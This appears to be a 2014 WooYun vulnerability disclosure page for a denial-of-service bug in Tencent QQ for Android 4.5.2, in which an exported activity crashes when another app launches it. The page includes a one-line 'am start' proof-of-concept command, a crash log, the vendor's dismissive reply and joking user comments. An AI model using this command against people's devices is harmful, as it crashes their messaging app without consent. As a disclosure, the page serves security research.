当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-048176

漏洞标题:Tencent Messenger(QQ) Dos vulnerability(critical)

相关厂商:腾讯

漏洞作者: Pentest.mobi

提交时间:2014-01-07 15:54

修复时间:2014-04-04 15:55

公开时间:2014-04-04 15:55

漏洞类型:拒绝服务

危害等级:高

自评Rank:16

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-01-07: 细节已通知厂商并且等待厂商处理中
2014-01-08: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2014-03-04: 细节向核心白帽子及相关领域专家公开
2014-03-14: 细节向普通白帽子公开
2014-03-24: 细节向实习白帽子公开
2014-04-04: 细节向公众公开

简要描述:

Tencent Messenger(QQ) Version: 4.5.2 critical Dos vulnerability need to be handled.

详细说明:

com.tencent.mobileqq.activity.QQBrowserDelegationActivity这个activity组件可被任意第三方程序调用导致进程crash.
Process Name: com.tencent.mobileqq
Version: 4.5.2
问题包:http://pan.baidu.com/s/1lEFzo
poc:
am start -n com.tencent.mobileqq/com.tencent.mobileqq.activity.QQBrowserDelegationActivity
crash log:

E/AndroidRuntime( 2420): java.lang.RuntimeException: Unable to start activity ComponentInfo{com.tencent.mobileqq/com.tencent.mobileqq.activity.QQBrowserDelegationActivity}: java.lang.NullPointerException: uriString
E/AndroidRuntime( 2420):     at android.app.ActivityThread.performLaunchActivity(ActivityThread.java:1955)
E/AndroidRuntime( 2420):     at android.app.ActivityThread.handleLaunchActivity(ActivityThread.java:1980)
E/AndroidRuntime( 2420):     at android.app.ActivityThread.access$600(ActivityThread.java:122)
E/AndroidRuntime( 2420):     at android.app.ActivityThread$H.handleMessage(ActivityThread.java:1146)
E/AndroidRuntime( 2420):     at android.os.Handler.dispatchMessage(Handler.java:99)
E/AndroidRuntime( 2420):     at android.os.Looper.loop(Looper.java:137)
E/AndroidRuntime( 2420):     at android.app.ActivityThread.main(ActivityThread.java:4340)
E/AndroidRuntime( 2420):     at java.lang.reflect.Method.invokeNative(Native Method)
E/AndroidRuntime( 2420):     at java.lang.reflect.Method.invoke(Method.java:511)
E/AndroidRuntime( 2420):     at com.android.internal.os.ZygoteInit$MethodAndArgsCaller.run(ZygoteInit.java:784)
E/AndroidRuntime( 2420):     at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:551)
E/AndroidRuntime( 2420):     at dalvik.system.NativeStart.main(Native Method)
E/AndroidRuntime( 2420): Caused by: java.lang.NullPointerException: uriString
E/AndroidRuntime( 2420):     at android.net.Uri$StringUri.<init>(Uri.java:464)
E/AndroidRuntime( 2420):     at android.net.Uri$StringUri.<init>(Uri.java:454)
E/AndroidRuntime( 2420):     at android.net.Uri.parse(Uri.java:426)
E/AndroidRuntime( 2420):     at com.tencent.mtt.spcialcall.sdk.MttApi.loadUrlInMbWnd(MttApi.java:68)
E/AndroidRuntime( 2420):     at com.tencent.mobileqq.activity.QQBrowserDelegationActivity.a(ProGuard:264)
E/AndroidRuntime( 2420):     at com.tencent.mobileqq.activity.QQBrowserDelegationActivity.b(ProGuard:448)
E/AndroidRuntime( 2420):     at com.tencent.mobileqq.activity.QQBrowserDelegationActivity.onCreate(ProGuard:99)
E/AndroidRuntime( 2420):     at android.app.Activity.performCreate(Activity.java:4465)
E/AndroidRuntime( 2420):     at android.app.Instrumentation.callActivityOnCreate(Instrumentation.java:1049)
E/AndroidRuntime( 2420):     at android.app.ActivityThread.performLaunchActivity(ActivityThread.java:1919)
E/AndroidRuntime( 2420):     ... 11 more
W/ActivityManager(   78):   Force finishing activity com.tencent.mobileqq/.activity.QQBrowserDelegationActivity
W/InputManagerService(   78): Window already focused, ignoring focus gain of: com.android.internal.view.IInputMethodClient$Stub$Proxy@41603f58
W/ThrottleService(   78): unable to find stats for iface rmnet0
I/WindowManager(   78): createSurface Window{414395e0  paused=false}: DRAW NOW PENDING
D/dalvikvm( 2420): GC_CONCURRENT freed 754K, 7% free 12872K/13767K, paused 4ms+17ms
W/ActivityManager(   78): Activity pause timeout for ActivityRecord{41b8a678 com.tencent.mobileqq/.activity.QQBrowserDelegationActivity}
W/NetworkManagementSocketTagger(   78): setKernelCountSet(10035, 0) failed with errno -2
D/dalvikvm( 2420): GC_CONCURRENT freed 727K, 6% free 13146K/13959K, paused 4ms+4ms
E/MSF.S.AppProcessManager( 2118): [E]can not find com.tencent.mobileqq to receive msg to:null from:FromServiceMsg msName:onRecvPushMsg ssoSeq:711488865 failCode:1000 errorMsg: uin:187224929 serviceCmd:OnlinePush.PbPushGroupMsg appId:-1 appSeq:711488865
E/MSF.S.AppProcessManager( 2118): [E]can not find com.tencent.mobileqq to receive msg to:null from:FromServiceMsg msName:onRecvPushMsg ssoSeq:711489146 failCode:1000 errorMsg: uin:187224929 serviceCmd:OnlinePush.PbPushGroupMsg appId:-1 appSeq:711489146
E/MSF.S.AppProcessManager( 2118): [E]can not find com.tencent.mobileqq to receive msg to:null from:FromServiceMsg msName:onRecvPushMsg ssoSeq:711502275 failCode:1000 errorMsg: uin:187224929 serviceCmd:OnlinePush.PbPushGroupMsg appId:-1 appSeq:711502275
W/ActivityManager(   78): Activity destroy timeout for ActivityRecord{41b8a678 com.tencent.mobileqq/.activity.QQBrowserDelegationActivity}
W/ActivityManager(   78): Timeout executing service: ServiceRecord{41a68a38 com.tencent.mobileqq/.app.GuardService}
I/ActivityManager(   78): Crashing app skipping ANR: ProcessRecord{4145d828 2420:com.tencent.mobileqq/10035} Executing service com.tencent.mobileqq/.app.GuardService

漏洞证明:

DOS-QQ1.jpg


DOS-QQ2.jpg

修复方案:

版权声明:转载请注明来源 Pentest.mobi@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-04-04 15:55

厂商回复:

非常感谢您的报告,新版本已不存在报告中问题,感谢对腾讯业务的关注。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理。

最新状态:

暂无

漏洞评价:

评论

  1. 2014-01-07 16:47 | 瘦蛟舞 认证白帽子 ( 普通白帽子 | Rank:687 漏洞数:78 | 铁甲依然在)

    很厉害的样子~

  2. 2014-01-07 17:39 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    大牛都喜欢秀下英文啊

  3. 2014-01-07 18:13 | 233 ( 路人 | Rank:14 漏洞数:4 | 小孩子看了根本把持不住)

    ni zai say what?

  4. 2014-01-07 18:46 | HoerWing ( 路人 | Rank:24 漏洞数:4 | "People should not be afraid of their go...)

    can U not speak your fucking Englishi?

  5. 2014-01-07 20:04 | JJFly ( 路人 | Rank:2 漏洞数:1 | <a href="www.yidianjiujijifly.com">www.y...)

    wodecet3haimeiguozenmeban,qiudaikao

  6. 2014-01-08 09:21 | sdj ( 实习白帽子 | Rank:45 漏洞数:6 | 最神奇的一群人,智慧低调又内敛,俗称马甲...)

    title lve diao.

  7. 2014-01-08 10:16 | leehenwu ( 普通白帽子 | Rank:194 漏洞数:24 | 撸·啊·撸)

    balabala

  8. 2014-01-08 10:18 | 4399gdww ( 路人 | Rank:20 漏洞数:4 | )

    I can speak Chinese?yesfuck

  9. 2014-01-08 10:34 | hqdvista ( 普通白帽子 | Rank:154 漏洞数:31 | N/A)

    mu ce shi na ge dong

  10. 2014-01-08 13:29 | 小震 ( 路人 | Rank:8 漏洞数:3 | ~)

    wǒ dōu bú zhī dào nǐ men shuō de shí me dōng xī 。fǎn zhèng wǒ de yīng wén shì fēi cháng hǎo de ,nǐ men shuō de bú shì biāo zhǔn yīng yǔ ~

  11. 2014-01-08 13:44 | 4399gdww ( 路人 | Rank:20 漏洞数:4 | )

    @小震 diǎo

  12. 2014-01-08 22:43 | 雷锋 ( 路人 | Rank:12 漏洞数:2 | 承接:钻井,架工,木工,电工,水暖工,力...)

    屌丝必备,谷歌翻译

  13. 2014-01-10 17:07 | Enjoy_Hacking ( 实习白帽子 | Rank:84 漏洞数:8 | 时间无言,如此这般。)

    diào!